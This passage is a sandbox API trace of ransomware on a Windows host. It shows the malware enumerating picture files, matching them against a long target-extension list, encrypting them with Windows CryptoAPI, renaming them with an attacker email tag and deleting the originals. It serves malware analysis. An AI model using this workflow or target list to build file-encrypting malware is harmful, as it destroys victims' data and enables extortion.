	[0196.246] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfea3c8*, pdwDataLen=0x18bc0c*=0xd239, dwBufLen=0xd240 | out: pbData=0xfea3c8*, pdwDataLen=0x18bc0c*=0xd240) returned 1
	[0196.248] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.248] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0196.248] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.248] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0196.248] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.248] CryptReleaseContext (hProv=0xfcaef0, dwFlags=0x0) returned 1
	[0196.249] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.249] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.249] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.250] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0196.251] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 94
	[0196.251] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0196.251] WriteFile (in: hFile=0x2c0, lpBuffer=0xfea3c8*, nNumberOfBytesToWrite=0xd240, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfea3c8*, lpNumberOfBytesWritten=0x18c068*=0xd240, lpOverlapped=0x0) returned 1
	[0196.256] CloseHandle (hObject=0x2c0) returned 1
	[0196.257] CloseHandle (hObject=0x384) returned 1
	[0196.257] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png")) returned 1
	[0196.265] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png")) returned 0
	[0196.265] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56be5320, ftCreationTime.dwHighDateTime=0x1d974fa, ftLastAccessTime.dwLowDateTime=0x7d868de0, ftLastAccessTime.dwHighDateTime=0x1d9767d, ftLastWriteTime.dwLowDateTime=0x7d868de0, ftLastWriteTime.dwHighDateTime=0x1d9767d, nFileSizeHigh=0x0, nFileSizeLow=0x14b0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VYVCUXI7NluwaWQyke.png", cAlternateFileName="VYVCUX~1.PNG")) returned 1
	[0196.265] lstrcmpW (lpString1="VYVCUXI7NluwaWQyke.png", lpString2="..") returned 1
	[0196.265] lstrcmpW (lpString1="VYVCUXI7NluwaWQyke.png", lpString2=".") returned 1
	[0196.265] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0196.265] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="VYVCUXI7NluwaWQyke.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VYVCUXI7NluwaWQyke.png") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VYVCUXI7NluwaWQyke.png"
	[0196.265] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VYVCUXI7NluwaWQyke.png") returned 53
	[0196.265] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0196.266] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VYVCUXI7NluwaWQyke.png", cchLength=0x35 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png") returned 0x35
	[0196.266] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.266] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0196.266] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png") returned="c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png"
	[0196.266] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png") returned 53
	[0196.266] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.267] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.267] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0196.267] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.267] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0196.267] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0196.268] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0196.268] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0196.272] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x14b0e, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x14b0e, lpOverlapped=0x0) returned 1
	[0196.278] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.279] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcac48) returned 1
	[0196.281] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.281] CryptCreateHash (in: hProv=0xfcac48, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0196.281] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.281] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0196.281] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.282] CryptDeriveKey (in: hProv=0xfcac48, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0196.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.282] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x14b0e, dwBufLen=0x14b0e | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x14b10) returned 1
	[0196.285] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.285] RtlMoveMemory (in: Destination=0xff1c98, Source=0xfdd180, Length=0x14b0e | out: Destination=0xff1c98) 
	[0196.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.285] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff1c98*, pdwDataLen=0x18bc0c*=0x14b0e, dwBufLen=0x14b10 | out: pbData=0xff1c98*, pdwDataLen=0x18bc0c*=0x14b10) returned 1
	[0196.287] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.287] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0196.287] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.288] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0196.288] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.288] CryptReleaseContext (hProv=0xfcac48, dwFlags=0x0) returned 1
	[0196.288] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.288] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.289] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.289] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0196.290] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 95
	[0196.290] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0196.292] WriteFile (in: hFile=0x2c0, lpBuffer=0xff1c98*, nNumberOfBytesToWrite=0x14b10, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff1c98*, lpNumberOfBytesWritten=0x18c068*=0x14b10, lpOverlapped=0x0) returned 1
	[0196.298] CloseHandle (hObject=0x2c0) returned 1
	[0196.298] CloseHandle (hObject=0x384) returned 1
	[0196.298] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png")) returned 1
	[0196.306] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\vyvcuxi7nluwawqyke.png")) returned 0
	[0196.306] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa6c50d0, ftCreationTime.dwHighDateTime=0x1d96f37, ftLastAccessTime.dwLowDateTime=0xb036a4b0, ftLastAccessTime.dwHighDateTime=0x1d9762c, ftLastWriteTime.dwLowDateTime=0xb036a4b0, ftLastWriteTime.dwHighDateTime=0x1d9762c, nFileSizeHigh=0x0, nFileSizeLow=0xad6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="we1oVW4nq.png", cAlternateFileName="WE1OVW~1.PNG")) returned 1
	[0196.306] lstrcmpW (lpString1="we1oVW4nq.png", lpString2="..") returned 1
	[0196.306] lstrcmpW (lpString1="we1oVW4nq.png", lpString2=".") returned 1
	[0196.306] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0196.306] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="we1oVW4nq.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\we1oVW4nq.png") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\we1oVW4nq.png"
	[0196.306] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\we1oVW4nq.png") returned 44
	[0196.322] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0196.322] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\we1oVW4nq.png", cchLength=0x2c | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png") returned 0x2c
	[0196.322] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.383] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0196.386] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png") returned="c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png"
	[0196.417] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png") returned 44
	[0196.417] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.417] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.418] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0196.418] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.418] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.